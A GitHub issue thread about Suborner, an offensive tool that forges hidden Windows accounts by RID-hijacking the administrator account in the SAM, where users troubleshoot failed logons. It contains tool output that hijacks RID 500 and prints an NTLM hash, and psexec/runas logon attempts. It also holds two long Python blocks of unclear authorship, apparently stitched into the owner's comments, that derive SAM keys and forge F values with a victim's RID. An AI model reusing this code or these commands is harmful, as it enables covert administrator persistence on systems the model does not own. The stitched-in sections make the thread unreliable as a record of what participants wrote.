Unable to login to SMB with the created account #3

Status: Open
pandatest2023 opened this issue Sep 3, 2022 · 14 comments
Labels: bug (Something isn't working)
pandatest2023 commented Sep 3, 2022

Unable to login to SMB with the created account

@pandatest2023 pandatest2023 changed the title Unable to log in to SMB with the created account Unable to login to SMB with the created account Sep 3, 2022
pandatest2023 (Author) commented:

[screenshot attachment: 1662216234085]

lzzbb commented Sep 3, 2022

I have the same problem

r4wd3r (Owner) commented Sep 3, 2022

Hey!

Is it a domain controller? Suborner will not work against domain controllers since they don't use the MSV1_0.dll authentication package by default (no local user authentication).

No-Github commented:

Same problem, a workgroup environment.

r4wd3r (Owner) commented Sep 4, 2022

That's weird. Could you please share more information about your environment? What happens if you create the account with the /machineaccount parameter set as no?

pandatest2023 (Author) commented Sep 8, 2022

> That's weird. Could you please share more information about your environment? What happens if you create the account with the /machineaccount parameter set as no?

OS: Microsoft Windows Server 2008 R2 Datacenter
Ver: 6.1.7601 Service Pack 1 Build 7601
[screenshot attachment: 6fd894c9ffd788c75fc51ae49ec4832]

r4wd3r (Owner) commented Sep 8, 2022

@Phantom0000 I'll try to reproduce your environment when I get some time. In the meantime, please try to authenticate interactively (e.g. RDP, sign-in screen) with the suborner account created with the /machineaccount:no and let me know how it goes.

UbuntuOS-git commented:

Can Windows 7 and Server 2012 R2 be automated with Suborner? I tried and failed later. Or do I need to do it manually?

jfma7 commented Sep 30, 2022

> @Phantom0000 I'll try to reproduce your environment when I get some time. In the meantime, please try to authenticate interactively (e.g. RDP, sign-in screen) with the suborner account created with the /machineaccount:no and let me know how it goes.

It doesn't work from my side. Win 10 environment.

eabase commented Dec 6, 2022

@r4wd3r
Hi! I was checking your really informative & cool presentation. (Thank you!)
While trying to map out the ACBs you presented, I googled up what seem to be changes to those.

ACB - Account Control Bits

[1] 2.2.16 userAccountControl Bits
[2] Use the UserAccountControl flags to manipulate user account properties
[3] and this

Maybe that explains why it is no longer working?

| Property flag | Value in hexadecimal |
|---|---|
| SCRIPT | 0x0001 |
| ACCOUNTDISABLE | 0x0002 |
| HOMEDIR_REQUIRED | 0x0008 |
| LOCKOUT | 0x0010 |
| PASSWD_NOTREQD | 0x0020 |
| PASSWD_CANT_CHANGE | 0x0040 |
| ENCRYPTED_TEXT_PWD_ALLOWED | 0x0080 |
| TEMP_DUPLICATE_ACCOUNT | 0x0100 |
| NORMAL_ACCOUNT | 0x0200 |
| INTERDOMAIN_TRUST_ACCOUNT | 0x0800 |
| WORKSTATION_TRUST_ACCOUNT | 0x1000 |
| SERVER_TRUST_ACCOUNT | 0x2000 |
| DONT_EXPIRE_PASSWORD | 0x10000 |
| MNS_LOGON_ACCOUNT | 0x20000 |
| SMARTCARD_REQUIRED | 0x40000 |
| TRUSTED_FOR_DELEGATION | 0x80000 |
| NOT_DELEGATED | 0x100000 |
| USE_DES_KEY_ONLY | 0x200000 |
| DONT_REQ_PREAUTH | 0x400000 |
| PASSWORD_EXPIRED | 0x800000 |
| TRUSTED_TO_AUTH_FOR_DELEGATION | 0x1000000 |
| PARTIAL_SECRETS_ACCOUNT | 0x04000000 |

hamigua9527 commented:

Can you provide the author's environment and login method?

pshelton-skype commented Feb 14, 2023

I also cannot seemingly interact with the account after creating it. I'm testing on a Windows Azure virtual machine running the default Server 2022 Datacenter image created through the Azure portal.

```
PS C:\> PsExec.exe -s suborner64.exe /username:suborner8 /password:Password123456!

PsExec v2.34 - Execute processes remotely
Copyright (C) 2001-2021 Mark Russinovich
Sysinternals - www.sysinternals.com
 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
      88
  .d88888b.                  S U B O R N E R
 d88P 88"88b
 Y88b.88        The Invisible Account Forger
 "Y88888b.                        by @r4wd3r
      88"88b                          v1.0.1
 Y88b 88.88P
  "Y88888P"               https://r4wsec.com
      88
 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

[-] Appending $ to username
[+] Suborner Account Data:
- Username: suborner8$
- Password: Password123456!
- RID: 1007
- Template Account RID: 500
- Account to hijack (RID): 500
- Machine account: True
--------------------------------------------
[+] Crafting suborner account suborner8$
[+] Crafted names key
[-] RID Hijacking: Setting victim's RID 500 to new account suborner8$ for impersonation
[-] Setting account as enabled as machine account
[+] Crafted F key
[-] Writing V account values
[-] Encrypting password for V
[-] NTLM Hash for password: BEE98DC086291586556711A645C6BD58
[+] Crafted V key
[-] Writing changes to registry
[+] The suborner account suborner8$ has been created!
C:\Users\remoteuser\suborner64.exe exited on pshelton-suborn with error code 0.

PS C:\> python .\psexec.py suborner8\$:[email protected] cmd
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

PS C:\>runas /user:suborner8 cmd
Enter the password for suborner8:
Attempting to start cmd as user "pshelton-suborn\suborner8" ...
RUNAS ERROR: Unable to run - cmd
1326: The user name or password is incorrect.

PS C:\> runas /user:suborner8$ cmd
Enter the password for suborner8$:
Attempting to start cmd as user "pshelton-suborn\suborner8$" ...
RUNAS ERROR: Unable to run - cmd
1326: The user name or password is incorrect.

PS C:\ > runas /user:suborner8\$ cmd
Enter the password for suborner8\$:
Attempting to start cmd as user "suborner8\$" ...
RUNAS ERROR: Unable to run - cmd
1326: The user name or password is incorrect.

PS C:\> PsExec.exe -s suborner64.exe /username:suborner10 /password:Password123456! /machineaccount:no

PsExec v2.34 - Execute processes remotely
Copyright (C) 2001-2021 Mark Russinovich
Sysinternals - www.sysinternals.com
 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
      88
  .d88888b.                  S U B O R N E R
 d88P 88"88b
 Y88b.88        The Invisible Account Forger
 "Y88888b.                        by @r4wd3r
      88"88b                          v1.0.1
 Y88b 88.88P
  "Y88888P"               https://r4wsec.com
      88
 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

[-] Appending $ to username
[+] Suborner Account Data:
- Username: suborner10$
- Password: Password123456!
- RID: 1009
- Template Account RID: 500
- Account to hijack (RID): 500
- Machine account: False
--------------------------------------------
[+] Crafting suborner account suborner10$
[+] Crafted names key
[-] RID Hijacking: Setting victim's RID 500 to new account suborner10$ for impersonation
[-] Setting account as enabled as normal account
[+] Crafted F key
[-] Writing V account values
[-] Encrypting password for V
[-] NTLM Hash for password: BEE98DC086291586556711A645C6BD58
[+] Crafted V key
[-] Writing changes to registry
[+] The suborner account suborner10$ has been created!
C:\Users\remoteuser\suborner64.exe exited on pshelton-suborn with error code 0.

PS C:\> runas /user:suborner10\$ cmd
Enter the password for suborner10\$:
Attempting to start cmd as user "suborner10\$" ...
RUNAS ERROR: Unable to run - cmd
1326: The user name or password is incorrect.

PS C:\> runas /user:suborner10$ cmd
Enter the password for suborner10$:
Attempting to start cmd as user "pshelton-suborn\suborner10$" ...
RUNAS ERROR: Unable to run - cmd
1326: The user name or password is incorrect.

PS C:\> runas /user:suborner10 cmd
Enter the password for suborner10:
Attempting to start cmd as user "pshelton-suborn\suborner10" ...
RUNAS ERROR: Unable to run - cmd
1326: The user name or password is incorrect.

PS C:\> python .\psexec.py suborner10\$:[email protected] cmd
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

PS C:\> python .\psexec.py [email protected] cmd
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[-] SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)

PS C:\> python .\psexec.py [email protected] cmd
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[-] SMB SessionError: STATUS_ACCOUNT_LOCKED_OUT(The user account has been automatically locked because too many invalid logon attempts or password change attempts have been requested.)
```

This last account is the only time I've received something other than a blanket "The login attempt failed" error over RDP. I used RDP username localhost\suborner10$ and received:

As a security precaution, the user account has been locked because there were too many logon attempts or password change attempts. Wait a while before trying again, or contact your system administrator or technical support.

Otherwise it seems that none of the accounts can be interacted with successfully.

r4wd3r (Owner) commented Feb 26, 2023

Hello, everyone here! I am so sorry for the delay. I have been pretty busy these days.

I have not been able to reproduce this, but a person reached out to me via Discord, and I asked him to perform this. Apparently, this may have to do with how Suborner encrypts the NTLM hash to the SAM Encrypted hash.

Please try the following and let me know if you can access the system @pshelton-skype @jfma7 @UbuntuOS-git @pandatest2023 @No-Github @lzzbb

  1. Create a suborner account with the flag machine account set as no (i.e., /machineaccount:no)
  2. Change the password of the account via net user (i.e., net user myaccount$ MySecretPassword123)
  3. Try to connect via RDP/SMB to the system and see if you have the credentials error again.
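The suspicion above is that the problem sits between the NT hash and the encrypted form written to the SAM. Two checks a practitioner would run before following the reset procedure, as an added Python example that is mine and not Suborner's code: recompute the NT hash (MD4 over the UTF-16LE password) independently and compare it with the value Suborner printed in the pshelton-skype output (`Password123456!` / `BEE98DC086291586556711A645C6BD58`), so the hash step can be ruled in or out; and derive the two DES keys that the publicly documented SAM on-disk format (as implemented by dumpers such as impacket's secretsdump, for both the RC4- and the AES-based variants) derives from the account's RID. The second function only makes the RID dependence of that layer visible: the thread does not establish which RID (the stored 1007/1009 or the hijacked 500) Suborner uses, and nothing here claims it does. The MD4 implementation is pure Python because hashlib's md4 is often unavailable in OpenSSL 3 builds.

```python
import struct

MASK32 = 0xFFFFFFFF


def _md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib's md4 is frequently disabled under OpenSSL 3)."""
    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, order, shifts in rounds:
            for i, j in enumerate(order):
                t = (a + fn(b, c, d) + x[j] + k) & MASK32
                s = shifts[i % 4]
                # rotate the working variables so the next step operates on the next register
                a, b, c, d = d, ((t << s) | (t >> (32 - s))) & MASK32, b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), upper-case hex as Suborner prints it."""
    return _md4(password.encode("utf-16le")).hex().upper()


# Copied from the pshelton-skype output in this thread.
TOOL_PASSWORD = "Password123456!"
TOOL_NT_HASH = "BEE98DC086291586556711A645C6BD58"


def tool_hash_matches() -> bool:
    """True if an independent MD4 agrees with the hash Suborner printed. If it does, the NT hash
    step is not the bug and attention moves to the SAM-side encryption of that hash."""
    return nt_hash(TOOL_PASSWORD) == TOOL_NT_HASH


def _transform_key(k7: bytes) -> bytes:
    """Spread 7 key bytes over 8 DES key bytes (the pwdump/impacket str_to_key routine)."""
    out = [
        k7[0] >> 1,
        ((k7[0] & 0x01) << 6) | (k7[1] >> 2),
        ((k7[1] & 0x03) << 5) | (k7[2] >> 3),
        ((k7[2] & 0x07) << 4) | (k7[3] >> 4),
        ((k7[3] & 0x0F) << 3) | (k7[4] >> 5),
        ((k7[4] & 0x1F) << 2) | (k7[5] >> 6),
        ((k7[5] & 0x3F) << 1) | (k7[6] >> 7),
        k7[6] & 0x7F,
    ]
    return bytes((v << 1) & 0xFE for v in out)


def rid_des_keys(rid: int) -> tuple:
    """The two DES keys the SAM hash format derives from the account RID (little-endian uint32).
    The stored NT hash halves are DES-encrypted under these before the RC4/AES layer."""
    r = struct.pack("<I", rid)
    k1 = bytes([r[0], r[1], r[2], r[3], r[0], r[1], r[2]])
    k2 = bytes([r[3], r[0], r[1], r[2], r[3], r[0], r[1]])
    return _transform_key(k1), _transform_key(k2)


if __name__ == "__main__":
    print("independent NT hash:", nt_hash(TOOL_PASSWORD), "matches tool:", tool_hash_matches())
    for rid in (500, 1007):   # hijacked RID vs. the RID the account is actually stored under
        k1, k2 = rid_des_keys(rid)
        print("RID %d DES keys: %s %s" % (rid, k1.hex(), k2.hex()))
```

If `tool_hash_matches()` is True on your copy, the NTLM step is fine and the reset via `net user` in step 2 above is the right experiment: it makes the SAM service itself re-encrypt the hash, so a successful logon afterwards localises the defect to the encryption layer rather than to the account's F/V structure.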

r4wd3r (Owner) commented Feb 26, 2023

@eabase: Thanks for your thorough analysis. You are right, those are the ACB described by MSFT, yet those values are used to call the API with a structure such as USER_INFO_1 as an argument. AFAIK, if you set the flags to 0x1000 in this structure, it will write the value 0x80 in the SAM. You can try it to confirm this by directly calling the NetUserAdd API, setting the USER_INFO_1 structure with the flag values you shared, and comparing them with what is written in the SAM.
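For the UAC/ACB question raised by eabase and answered in the reply above, an added Python example (mine, not Suborner's or Microsoft's code): it maps USER_INFO_1 `usri1_flags` (the UF_* / userAccountControl values in the table posted above) to the ACB bits the SAM stores, per MS-SAMR 2.2.1.12 and 3.1.5.14.2, which reproduces the 0x1000 to 0x80 case (UF_WORKSTATION_TRUST_ACCOUNT to ACB_WSTRUST), and then parses and patches the RID and ACB fields of an F value the way Suborner's "RID Hijacking" output describes. The F-value offsets (RID as uint32 LE at 0x30, ACB as uint16 LE at 0x38) are my assumption from public SAM reverse engineering, not from this thread, and the template F blob is constructed; verify both against a real hive before relying on them.

```python
import struct

# USER_INFO_1 usri1_flags / userAccountControl UF_* values (the table posted above).
UF = {
    "SCRIPT": 0x0001, "ACCOUNTDISABLE": 0x0002, "HOMEDIR_REQUIRED": 0x0008,
    "LOCKOUT": 0x0010, "PASSWD_NOTREQD": 0x0020, "PASSWD_CANT_CHANGE": 0x0040,
    "ENCRYPTED_TEXT_PWD_ALLOWED": 0x0080, "TEMP_DUPLICATE_ACCOUNT": 0x0100,
    "NORMAL_ACCOUNT": 0x0200, "INTERDOMAIN_TRUST_ACCOUNT": 0x0800,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000, "SERVER_TRUST_ACCOUNT": 0x2000,
    "DONT_EXPIRE_PASSWORD": 0x10000, "MNS_LOGON_ACCOUNT": 0x20000,
    "SMARTCARD_REQUIRED": 0x40000, "TRUSTED_FOR_DELEGATION": 0x80000,
    "NOT_DELEGATED": 0x100000, "USE_DES_KEY_ONLY": 0x200000,
    "DONT_REQ_PREAUTH": 0x400000, "PASSWORD_EXPIRED": 0x800000,
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000, "PARTIAL_SECRETS_ACCOUNT": 0x04000000,
}

# SAM account control bits (MS-SAMR 2.2.1.12), the representation written to the F value.
ACB = {
    "DISABLED": 0x0001, "HOMDIRREQ": 0x0002, "PWNOTREQ": 0x0004, "TEMPDUP": 0x0008,
    "NORMAL": 0x0010, "MNS": 0x0020, "DOMTRUST": 0x0040, "WSTRUST": 0x0080,
    "SVRTRUST": 0x0100, "PWNOEXP": 0x0200, "AUTOLOCK": 0x0400,
    "ENC_TXT_PWD_ALLOWED": 0x0800, "SMARTCARD_REQUIRED": 0x1000,
    "TRUSTED_FOR_DELEGATION": 0x2000, "NOT_DELEGATED": 0x4000, "USE_DES_KEY_ONLY": 0x8000,
    "DONT_REQUIRE_PREAUTH": 0x10000, "PW_EXPIRED": 0x20000,
    "TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION": 0x40000, "PARTIAL_SECRETS_ACCOUNT": 0x100000,
}

# UF_* <-> ACB_* correspondence (MS-SAMR 3.1.5.14.2). SCRIPT and PASSWD_CANT_CHANGE have no ACB bit.
_PAIRS = [
    ("ACCOUNTDISABLE", "DISABLED"), ("HOMEDIR_REQUIRED", "HOMDIRREQ"),
    ("PASSWD_NOTREQD", "PWNOTREQ"), ("TEMP_DUPLICATE_ACCOUNT", "TEMPDUP"),
    ("NORMAL_ACCOUNT", "NORMAL"), ("MNS_LOGON_ACCOUNT", "MNS"),
    ("INTERDOMAIN_TRUST_ACCOUNT", "DOMTRUST"), ("WORKSTATION_TRUST_ACCOUNT", "WSTRUST"),
    ("SERVER_TRUST_ACCOUNT", "SVRTRUST"), ("DONT_EXPIRE_PASSWORD", "PWNOEXP"),
    ("LOCKOUT", "AUTOLOCK"), ("ENCRYPTED_TEXT_PWD_ALLOWED", "ENC_TXT_PWD_ALLOWED"),
    ("SMARTCARD_REQUIRED", "SMARTCARD_REQUIRED"),
    ("TRUSTED_FOR_DELEGATION", "TRUSTED_FOR_DELEGATION"), ("NOT_DELEGATED", "NOT_DELEGATED"),
    ("USE_DES_KEY_ONLY", "USE_DES_KEY_ONLY"), ("DONT_REQ_PREAUTH", "DONT_REQUIRE_PREAUTH"),
    ("PASSWORD_EXPIRED", "PW_EXPIRED"),
    ("TRUSTED_TO_AUTH_FOR_DELEGATION", "TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION"),
    ("PARTIAL_SECRETS_ACCOUNT", "PARTIAL_SECRETS_ACCOUNT"),
]


def uac_to_acb(uac: int) -> int:
    """Translate USER_INFO_1 usri1_flags (UF_*) into the ACB word the SAM stores."""
    return sum(ACB[a] for u, a in _PAIRS if uac & UF[u])


def acb_to_uac(acb: int) -> int:
    """Inverse mapping: ACB word read from the SAM back to userAccountControl UF_* flags."""
    return sum(UF[u] for u, a in _PAIRS if acb & ACB[a])


def acb_names(acb: int) -> list:
    """ACB_* names set in an ACB word, in bit order, for readable output."""
    return [n for n, v in sorted(ACB.items(), key=lambda kv: kv[1]) if acb & v]


# ASSUMED F-value layout (public SAM reverse engineering, not from this thread): RID as uint32 LE
# at 0x30, ACB word as uint16 LE at 0x38. Check against a real hive before relying on it.
F_RID_OFFSET = 0x30
F_ACB_OFFSET = 0x38
F_MIN_LEN = 0x50


def parse_f(f: bytes) -> tuple:
    """Return (rid, acb) from an F value blob."""
    if len(f) < F_MIN_LEN:
        raise ValueError("F value too short")
    return struct.unpack_from("<I", f, F_RID_OFFSET)[0], struct.unpack_from("<H", f, F_ACB_OFFSET)[0]


def craft_f(template_f: bytes, hijack_rid: int, machine_account: bool) -> bytes:
    """Mirror the 'RID Hijacking' step in Suborner's output as I read it: start from the template
    account's F value, overwrite the RID with the victim's, and set the ACB to an enabled normal or
    machine account. The ACB is derived through the UF_* -> ACB_* mapping, not hard-coded."""
    uf = UF["WORKSTATION_TRUST_ACCOUNT"] if machine_account else UF["NORMAL_ACCOUNT"]
    acb = uac_to_acb(uf)            # 0x0080 (ACB_WSTRUST) or 0x0010 (ACB_NORMAL); DISABLED is clear
    out = bytearray(template_f)
    struct.pack_into("<I", out, F_RID_OFFSET, hijack_rid)
    struct.pack_into("<H", out, F_ACB_OFFSET, acb)
    return bytes(out)


# CONSTRUCTED sample: a zeroed F blob standing in for a template account with RID 500 that is a
# disabled normal account (ACB_NORMAL | ACB_DISABLED = 0x0011).
_buf = bytearray(F_MIN_LEN)
struct.pack_into("<I", _buf, F_RID_OFFSET, 500)
struct.pack_into("<H", _buf, F_ACB_OFFSET, ACB["NORMAL"] | ACB["DISABLED"])
SAMPLE_TEMPLATE_F = bytes(_buf)

if __name__ == "__main__":
    print("UF 0x1000 -> ACB 0x%04x" % uac_to_acb(0x1000))       # the 0x1000 -> 0x80 case
    rid, acb = parse_f(SAMPLE_TEMPLATE_F)
    print("template: rid=%d acb=0x%04x %s" % (rid, acb, acb_names(acb)))
    rid, acb = parse_f(craft_f(SAMPLE_TEMPLATE_F, hijack_rid=500, machine_account=False))
    print("forged:   rid=%d acb=0x%04x %s" % (rid, acb, acb_names(acb)))
```

Comparing `parse_f()` of the F value under the forged account's key with the ACB the tool claims to have set is the concrete version of the "compare with what is written in the SAM" suggestion above; `acb_to_uac()` lets you express what you find in the UF_* vocabulary of the table.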

@r4wd3r r4wd3r self-assigned this Mar 2, 2023
@r4wd3r r4wd3r added the bug Something isn't working label Mar 2, 2023